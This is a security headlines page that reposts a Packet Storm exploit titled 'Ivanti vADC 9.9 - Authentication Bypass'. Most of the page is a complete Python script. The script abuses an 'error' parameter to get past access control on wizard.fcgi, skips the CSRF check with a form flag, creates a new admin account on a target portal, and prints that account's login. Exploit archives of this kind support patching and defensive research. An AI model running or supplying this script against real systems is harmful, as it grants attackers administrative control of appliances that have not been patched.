Security
Headlines
HeadlinesLatestCVEs

Headline

Ivanti ADC 9.9 Authentication Bypass

Ivanti ADC version 9.9 suffers from an authentication bypass vulnerability.

Packet Storm
#csrf#vulnerability#web#linux#auth#docker
# Exploit Title: Ivanti vADC 9.9 - Authentication Bypass# Date: 2024-08-03# Exploit Author: ohnoisploited# Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller# Software Link: https://hubgw.docker.com/r/pulsesecure/vtm# Version: 9.9# Tested on: Linux# Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC # Fixed versions: 22.7R2+import requests# Set to target addressadmin_portal = 'https://192.168.88.130:9090'# User to createnew_admin_name = 'newadmin'new_admin_password = 'newadmin1234'requests.packages.urllib3.disable_warnings() session = requests.Session()# Setting 'error' bypasses access control for wizard.fcgi.# wizard.fcgi can load any section in the web interface.params = { 'error': 1,          'section': 'Access Management:LocalUsers' }# Create new user request# _form_submitted to bypass CSRFdata = {  '_form_submitted': 'form',          'create_user': 'Create',          'group': 'admin',          'newusername': new_admin_name,          'password1': new_admin_password,          'password2': new_admin_password }# Post requestr = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)# View responsecontent = r.content.decode('utf-8')print(content)if r.status_code == 200 and '<title>2<' in content:    print("New user request sent")    print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")else:    print("Unable to create new user")

Packet Storm: Latest News

TOR Virtual Network Tunneling Tool 0.4.8.13